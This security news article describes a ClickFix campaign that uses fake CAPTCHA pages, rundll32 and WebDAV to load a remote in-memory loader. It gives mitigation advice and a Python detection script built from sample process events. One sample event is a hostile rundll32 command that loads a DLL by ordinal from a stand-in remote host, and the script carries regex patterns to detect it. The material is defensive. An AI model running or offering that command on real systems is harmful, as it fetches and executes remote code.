Cybersecurity researchers at CyberProof have uncovered a new and more covert version of the ClickFix attack campaign. Unlike earlier variants, which relied heavily on monitored scripting tools such as PowerShell or mshta, this updated technique shifts toward abusing native Windows components. As a result, attackers can bypass traditional security defenses more effectively while reducing the chances of detection.

To begin with, this attack relies heavily on social engineering. Victims unknowingly trigger the infection when they land on a compromised or malicious website. In this campaign, analysts observed a fake CAPTCHA page hosted on “healthybyhillary[.]com.” This deceptive interface tricks users into believing they must verify their identity. Consequently, it instructs them to open the Windows Run dialog using the “Win + R” shortcut, paste a pre-copied command with “Ctrl + V,” and press Enter.

Once the victim executes the command, the attack chain begins immediately. Specifically, rundll32.exe connects to an external server over port 80. It leverages WebDAV functionality, allowing the system to treat a remote web resource as if it were a local file share. This clever misuse of WebDAV helps attackers bypass defenses that typically monitor script-based activities.

Moreover, the attackers implement additional evasion techniques to stay under the radar. For instance, instead of calling functions by recognizable names, the malicious command references an export function using an ordinal value “#1.” This approach makes static detection significantly more difficult for security tools.

Following the initial execution, rundll32.exe downloads a remote DLL file named “verification.google.” This file acts as a secondary loader known as SkimokKeep, which operates entirely in memory. Because it avoids writing files to disk, it further reduces detection risks.

Subsequently, the attack does transition to PowerShell, but in a stealthy manner: it uses non-interactive flags to quietly download and execute additional payloads without raising alerts. In addition, SkimokKeep employs further obfuscation. Instead of openly listing the Windows APIs it needs, it resolves them at runtime by comparing DJB2 hashes of export names, so the API names never appear as plain strings. It also checks whether it is running on a real system rather than a sandbox, thereby avoiding analysis by security researchers.

To mitigate this threat, organizations must adopt a broader detection strategy. Rather than focusing solely on script-based monitoring, defenders should closely observe unusual behavior involving native Windows tools. For example, security teams should flag instances where rundll32.exe loads davclnt.dll with DavSetCookie or initiates suspicious outbound connections using WebDAV syntax like “@80.”
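As an added illustration (not CyberProof's code or data), the Python below applies those three checks to constructed Sysmon-style process-creation records: a rundll32.exe command line that uses the `\\host@80\` WebDAV form, one that invokes an export by ordinal (`,#1`), and the WebClient-side `davclnt.dll,DavSetCookie` launch. The host 203.0.113.10, the field names and the rule labels are assumptions.

```python
import re

# Constructed sample records (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\203.0.113.10@80\share\verification.google,#1",
     "ParentImage": r"C:\Windows\explorer.exe"},          # launched from the Run dialog
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\davclnt.dll,DavSetCookie "
                    r"203.0.113.10 http://203.0.113.10/",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},  # WebClient service side
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},          # benign rundll32 use
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# UNC path whose host carries an explicit @80 port: WebDAV over plain HTTP.
WEBDAV_PORT_RE = re.compile(r"\\\\[^\\\s]+@80(?:\\|/|\b)", re.IGNORECASE)
# DLL export called by ordinal instead of by name, e.g. ",#1".
ORDINAL_EXPORT_RE = re.compile(r",\s*#\d+\b")
# WebClient cookie handler, the tell-tale of a WebDAV share being mounted.
DAVCLNT_RE = re.compile(r"davclnt\.dll\s*,\s*DavSetCookie", re.IGNORECASE)

def classify_event(event: dict) -> list[str]:
    """Return the ClickFix-style indicators found in one rundll32 process event."""
    indicators = []
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith("rundll32.exe"):
        return indicators
    if WEBDAV_PORT_RE.search(cmd):
        indicators.append("webdav_unc_port80")
    if ORDINAL_EXPORT_RE.search(cmd):
        indicators.append("ordinal_export")
    if DAVCLNT_RE.search(cmd):
        indicators.append("davclnt_setcookie")
    # A Run-dialog launch shows explorer.exe as parent; paired with WebDAV it
    # matches the user-triggered flow the lure depends on.
    parent = event.get("ParentImage", "").lower()
    if parent.endswith("explorer.exe") and "webdav_unc_port80" in indicators:
        indicators.append("user_triggered_webdav_load")
    return indicators

def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map record index -> indicators for every record that triggered a rule."""
    hits = {}
    for i, event in enumerate(events):
        found = classify_event(event)
        if found:
            hits[i] = found
    return hits
```

Running `scan(SAMPLE_EVENTS)` flags the first two records and leaves the benign rundll32 and notepad launches untouched.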

Furthermore, restricting unnecessary WebDAV traffic and monitoring abnormal user-triggered executions can help stop such attacks early. Since the attack depends heavily on user interaction, raising awareness about fake CAPTCHA scams becomes essential.

Overall, this evolving ClickFix campaign highlights how attackers continue to refine their techniques, emphasizing the importance of adaptive cybersecurity strategies.
